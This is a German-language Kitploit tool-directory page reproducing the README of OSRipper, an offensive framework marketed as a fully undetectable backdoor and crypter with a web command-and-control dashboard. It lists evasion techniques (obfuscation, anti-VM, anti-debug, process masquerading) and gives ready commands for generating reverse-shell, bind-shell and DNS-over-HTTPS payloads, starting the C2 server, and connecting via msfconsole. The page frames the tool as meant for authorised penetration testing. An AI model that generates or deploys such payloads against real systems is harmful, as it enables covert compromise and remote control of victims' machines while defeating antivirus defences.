Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
OSRipper — AV-umgehendes, plattformübergreifendes Backdoor- und Crypter-Framework mit einer integrierten, leichten WebUI | Kitploit
Tools/GitHubGitHub/noahoksuz/osripper
Exploit-FrameworksPayload-GenerierungIDS/IPS-UmgehungPost-ExploitationPenetrationstestsCommand and ControlLernen & BildungRed Teaming
GitHubnoahoksuz/osripper

OSRipper

AV-umgehendes, plattformübergreifendes Backdoor- und Crypter-Framework mit einer integrierten, leichten WebUI

Repository anzeigen
3285075vor 7 MonatenVon Kitploit geprüft
Webseite

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

OSRipper v0.4.2

OSRipper Logo

CodeFactor Python Version License Platform

Fortschrittlicher plattformübergreifender Payload-Generator und Crypter mit FUD-Fähigkeiten

Funktionen • Schnellstart • Web-UI • Payload-Typen • Dokumentation


Übersicht

OSRipper ist ein anspruchsvoller, vollständig unerkennbarer (FUD) Backdoor-Generator und Crypter, der für autorisierte Penetrationstests und Red-Team-Operationen entwickelt wurde. Er verfügt über fortschrittliche Umgehungstechniken, mehrere Payload-Typen und eine moderne webbasierte C2-Schnittstelle zur Verwaltung kompromittierter Systeme.

Hauptmerkmale

  • Vollständig unerkennbar (FUD) – Fortschrittliche Umgehungstechniken umgehen moderne AV-Lösungen
  • Webbasierte C2-Schnittstelle – Modernes Dashboard zur Verwaltung aktiver Sitzungen
  • Mehrere Payload-Typen – Bind-Shells, Reverse-Shells, DoH-C2, HTTPS-C2 und mehr
  • Mehrschichtige Verschleierung – Standard- und erweiterte Verschleierung mit randomisierten Variablen
  • Binärkompilierung – Kompilieren von Payloads zu eigenständigen ausführbaren Dateien
  • Verschlüsselte Kommunikation – SSL/TLS- und zertifikatgebundene HTTPS-C2-Kanäle
  • Tarnfunktionen – VM-Erkennung, Anti-Debugging, Prozess-Maskerade

Funktionen

Payload-Generierung

Payload-TypBeschreibungAnwendungsfall
Bind-ShellÖffnet Port auf dem OpferrechnerDirekter Zugriff, wenn Reverse-Verbindungen blockiert sind
Reverse TCP MeterpreterSSL/TLS-verschlüsselte Reverse-VerbindungStandard-Penetrationstests
DNS-over-HTTPS C2Verdeckter DoH-basierter Command & ControlUmgehung von Netzwerkbeschränkungen
HTTPS C2Zertifikatgebundener HTTPS-C2Sicherer, authentifizierter C2-Kanal
Gestaffelter PayloadMehrstufige WebauslieferungVerbesserte Tarnung bei der Bereitstellung
Crypter für benutzerdefinierten CodeVerschleierung beliebiger Python-SkripteVerschlüsselung benutzerdefinierter Payloads

Umgehungstechniken

  • Fortschrittliche Verschleierung – Mehrschichtige Code-Kodierung mit zufälligen Variablen
  • Erweiterte Verschleierung – Anti-Debug, VM-Erkennung, Junk-Code-Injektion
  • Anti-VM-Erkennung – Umgehung von Sandbox und virtuellen Maschinen
  • Tarnverzögerungen – Zufällige Startverzögerungen (5–15 Sekunden)
  • Prozess-Maskerade – Tarnung als legitime Systemprozesse
  • Signatur-Randomisierung – Jeder Payload ist einzigartig

Web-UI-Funktionen

  • Sitzungs-Dashboard – Anzeige aller aktiven C2-Sitzungen
  • Interaktives Terminal – Ausführen von Befehlen über die Webschnittstelle
  • Payload-Generator – Generierung von Payloads direkt über die Web-UI
  • Sitzungsverwaltung – Anzeige von Systeminformationen, Befehlshistorie und Verwaltung von Sitzungen
  • Echtzeit-Updates – Live-Befehlsausführung und Antwortanzeige

Erweiterte Funktionen

  • Ngrok-Integration – Automatische Tunnel-Erstellung für dynamische IPs
  • Zertifikatbindung – Sicherer HTTPS-C2 mit Zertifikatsüberprüfung
  • Sitzungspersistenz – Verbindungen über Neustarts hinweg aufrechterhalten
  • Befehlswarteschlange – Befehle für Offline-Agenten in die Warteschlange stellen
  • Antwort-Parsing – Automatische Analyse der Befehlsausgabe

Schnellstart

Installation

# Repository klonen
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper

# Abhängigkeiten installieren
pip3 install -r requirements.txt

# Paket installieren
pip3 install -e .

Wichtig – Setup für optionale Funktionen (ngrok, Binärkompilierung) ausführen:
Auf vielen Systemen (insbesondere Linux mit einer extern verwalteten Python-Umgebung) müssen Sie das integrierte Setup ausführen, damit optionale Abhängigkeiten in OSRippers eigener Venv installiert werden. Führen Sie dies einmal nach der Installation durch:

osripper-cli setup

Dadurch wird ~/.local/share/osripper/venv erstellt, pyngrok, nuitka und sandboxed installiert, und alle späteren Ausführungen von osripper / osripper-cli verwenden sie automatisch. Ohne diesen Schritt werden Sie bei --ngrok und --compile aufgefordert, das Setup auszuführen. Verwenden Sie osripper-cli setup --system nur, wenn Sie eine systemweite/user-pip-Installation anstelle der Venv bevorzugen.

Grundlegende Nutzung

Interaktiver Modus:

osripper
# oder
python3 -m osripper

Kommandozeile:

# Reverse-Shell generieren
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --compile

# DoH-C2-Payload generieren
osripper-cli doh -d example.com --obfuscate --compile

Web-UI:

# C2-Server mit Web-UI starten
python -m osripper.c2.server example.com --port 5000

# Dashboard unter http://localhost:5000 aufrufen

Web-UI

OSRipper enthält eine moderne webbasierte C2-Schnittstelle zur Verwaltung kompromittierter Systeme.

Funktionen

  • Dashboard – Übersicht über alle aktiven Sitzungen
  • Sitzungsverwaltung – Systeminformationen anzeigen und Befehle ausführen
  • Payload-Generator – DoH- und HTTPS-Payloads über die Webschnittstelle generieren
  • Befehlshistorie – Alle ausgeführten Befehle und Antworten verfolgen
  • Echtzeit-Updates – Live-Befehlsausführung und Antwortanzeige

C2-Server starten

# Grundlegende Nutzung
python -m osripper.c2.server example.com

# Mit HTTPS
python -m osripper.c2.server example.com --https

# Benutzerdefinierter Port
python -m osripper.c2.server example.com --port 8080

# Mit benutzerdefiniertem Zertifikat
python -m osripper.c2.server example.com --https --cert server.crt --key server.key

Auf die Web-UI zugreifen

Sobald der Server läuft, rufen Sie das Dashboard unter den folgenden Adressen auf:

  • HTTP: http://localhost:5000
  • HTTPS: https://localhost:5000 (falls aktiviert)

Payload-Typen

1. Bind-Shell-Backdoor

Öffnet einen Port auf dem Opferrechner und wartet auf Verbindungen.

osripper-cli bind -p 4444 --obfuscate --compile

Verbindung:

msfconsole -q -x 'use python/meterpreter/bind_tcp; set RHOST target_ip; set RPORT 4444; exploit'

2. Reverse TCP Meterpreter

Verschlüsselte Reverse-Verbindung mit SSL/TLS.

osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --enhanced --compile

3. DNS-over-HTTPS C2

Verdeckter C2-Kanal unter Verwendung des DNS-over-HTTPS-Protokolls. Umgeht viele Netzwerkbeschränkungen.

# Payload generieren
osripper-cli doh -d example.com --obfuscate --compile

# C2-Server starten
python -m osripper.c2.server example.com

Funktionen:

  • Verdeckte DNS-basierte Kommunikation
  • Web-UI zur Sitzungsverwaltung
  • Automatische Sitzungspersistenz
  • Befehlswarteschlange für Offline-Agenten

4. HTTPS-C2 (Zertifikatbindung)

Sicherer HTTPS-C2 mit Zertifikatbindung zur Authentifizierung.

# Payload generieren (über Web-UI oder CLI)
# C2-Server mit HTTPS starten
python -m osripper.c2.server example.com --https

# Zertifikat-Fingerabdruck abrufen
curl http://localhost:5000/api/cert-fingerprint

Funktionen:

  • Zertifikatbindung für Sicherheit
  • Verschlüsselte HTTPS-Kommunikation
  • Integration in die Web-UI
  • Sitzungsverwaltung

5. Gestaffelter Payload

Tool herunterladen